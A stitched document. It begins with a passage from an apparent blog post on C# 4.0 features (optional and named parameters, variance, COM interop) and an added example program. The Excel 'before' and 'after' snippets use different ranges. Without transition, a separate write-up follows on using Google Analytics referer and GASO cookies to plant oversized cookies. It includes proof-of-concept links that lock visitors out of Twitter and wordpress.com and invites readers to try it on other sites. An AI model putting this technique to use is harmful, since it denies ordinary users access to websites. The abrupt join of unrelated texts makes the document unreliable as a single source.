If I rightly remember, VB.net is preferred to C# when porting old projects in ancient languages like VB 5 / 6 or when creating COM wrappers, since VB.net allows you the use of Optional or Default parameters in methods. C# 4.0 has finally got this feature to make it that much more robust in this area.

You can now easily specify a default value for a parameter within the method declaration in C# 4.0. Also, the consumer of the method can either pass a value or can easily skip the parameter. When the parameter is skipped, the default value declared in the method is passed.

Here's a simple example to explain it:
Method declaration:
public static void GetMoney(int amount = 0) { }


Both of the below method calls for the above declaration are valid in C# 4.0:

GetMoney(); // 0 is used as amount in the method.
GetMoney(1000);


Named Arguments

Well, here's another relief for the developer. Did you know that in C# 4.0 the order of parameters in a method declaration and the order of arguments you pass when calling the method don't need to match anymore? You can now easily provide arguments to a method in any order you are comfortable with by specifying parameter names within the method call. This feature also tremendously improves the readability of one's code.

Here's a simple example of using Named Arguments in C# 4.0:
var sample = new List<int>();
sample.InsertRange(collection: new List<int>(), index: 0);
sample.InsertRange(index: 0, collection: new List<int>()); // both ways it'll work now


Covariance and Contravariance

Does the heading sound confusing? Well, the use of variance on generic type parameters in interfaces and delegates is yet another new feature available in C# 4.0. Strictly speaking, it doesn't add that much new functionality; rather, it makes things work in the first place the way you expected them to. A major advantage hidden in the power of C# 4.0 is shown in the simple line below. Note: the code below wouldn't have compiled until C# 4.0 was released:


IEnumerable<object> objects = new List<string>();

Now you have the ability to implicitly convert references for objects instantiated with different type arguments. This makes it that much more simpler and easier to reuse code.

Improved COM Interop Support

I started this article with the dynamic keyword, then we had optional parameters and named arguments; did you know that all of this actually enables a significant improvement in working with COM interop? Though all these features have arrived pretty late for the COM Interop world, it's a case of better late than never.

Take a look at my ugly code below:

var excelApp = new Excel.Application();
// . . .
excelApp.get_Range("A1", "B4").AutoFormat(
Excel.XlRangeAutoFormat.xlRangeAutoFormatTable3,
Type.Missing, Type.Missing, Type.Missing,
Type.Missing, Type.Missing, Type.Missing);

I can now simply write it in a few lines as below:

excelApp.Range["A1", "B3"].AutoFormat(
Excel.XlRangeAutoFormat.xlRangeAutoFormatClassic2);
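An added example, not from the original post, that puts the language features above into one runnable program, including contravariance (which the post names but does not show); the type and member names are made up for the demo.

```csharp
using System;
using System.Collections.Generic;
using System.Dynamic;

// Added example (not the original post's code); names below are invented for the demo.
public static class CSharp4Features
{
    // Optional parameters with defaults: callers may omit 'currency' and 'withSign'.
    public static string Describe(decimal amount, string currency = "INR", bool withSign = false)
    {
        return (withSign && amount >= 0 ? "+" : "") + amount + " " + currency;
    }

    // Covariance: IEnumerable<out T> lets a sequence of strings be read as a sequence of objects.
    public static int CountObjects(IEnumerable<object> items)
    {
        int n = 0;
        foreach (object o in items) n++;
        return n;
    }

    // Contravariance: Action<in T> lets a handler written for object accept string arguments.
    public static int RunHandlers(IEnumerable<string> names, Action<object> generalHandler)
    {
        Action<string> specific = generalHandler; // legal since C# 4.0
        int calls = 0;
        foreach (string s in names) { specific(s); calls++; }
        return calls;
    }

    public static void Main()
    {
        // dynamic + ExpandoObject: members are attached at run time and resolved late.
        dynamic account = new ExpandoObject();
        account.Number = "174258733-451269";
        account.Balance = 1500m;
        account.Branch = "Bangalore";
        string line = account.Number + " @ " + account.Branch + ": " + account.Balance;
        Console.WriteLine(line);

        // Optional and named arguments: omit defaults, or name them in any order.
        Console.WriteLine(Describe(1000m));                         // 1000 INR
        Console.WriteLine(Describe(withSign: true, amount: 1000m)); // +1000 INR
        Console.WriteLine(Describe(1000m, currency: "USD"));        // 1000 USD

        // Covariance: a List<string> passed where IEnumerable<object> is expected.
        var names = new List<string> { "Jason S", "Acme Corp" };
        Console.WriteLine(CountObjects(names)); // 2

        // Contravariance: an Action<object> handling each string.
        int calls = RunHandlers(names, o => Console.WriteLine("handled " + o));
        Console.WriteLine(calls); // 2
    }
}
```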

How to use Google Analytics to DoS a client from some website.

One of those cookies is the referer. This is true for "search result - organic referers", like for example, a Google search. The catch is that the detection on google's service is very bad, and we can fool it to think we are a google search result by doing:

http://google.yourfavoritedomain.com/search?q=search-term

So, you can guess.. if search-term is big enough we can hack the world.

Anyway, there's a catch. You can't set such a big cookie. The limit apparently is 4192 bytes. So, what you have to do is control 2 cookies.

The other cookie we are going to be using is GASO (Google Analytics Site Overlay); it's triggered by the content on
http://yourwebsite.com/page.html#gaso=somevalue

And well, the google analytics code will set a cookie called GASO to somevalue

With both vectors we can now set very big cookies! And with those cookies we can disable access to a lot of websites for anyone with just a link (or an iframe if you want to improve the stealth of the attack).

Twitter PoC:
http://google.sirdarckcat.net/?v=http://twitter.com/

If you use twitter over SSL...
http://google.sirdarckcat.net/?v=https://twitter.com/

To lock you out of all wordpress.com blogs:
http://google.sirdarckcat.net/?v=http://rofl.wordpress.com/
Try your favorite Google Analytics powered websites :D

References:
http://httpd.apache.org/docs/2.0/mod/core.html#limitrequestfieldsize
http://httpd.apache.org/docs/1.3/mod/core.html#limitrequestfieldsize
http://royal.pingdom.com/2008/05/28/google-analytics-dominate-the-top-500-websites/

Examples:
GASO limit

SEARCH referer limit
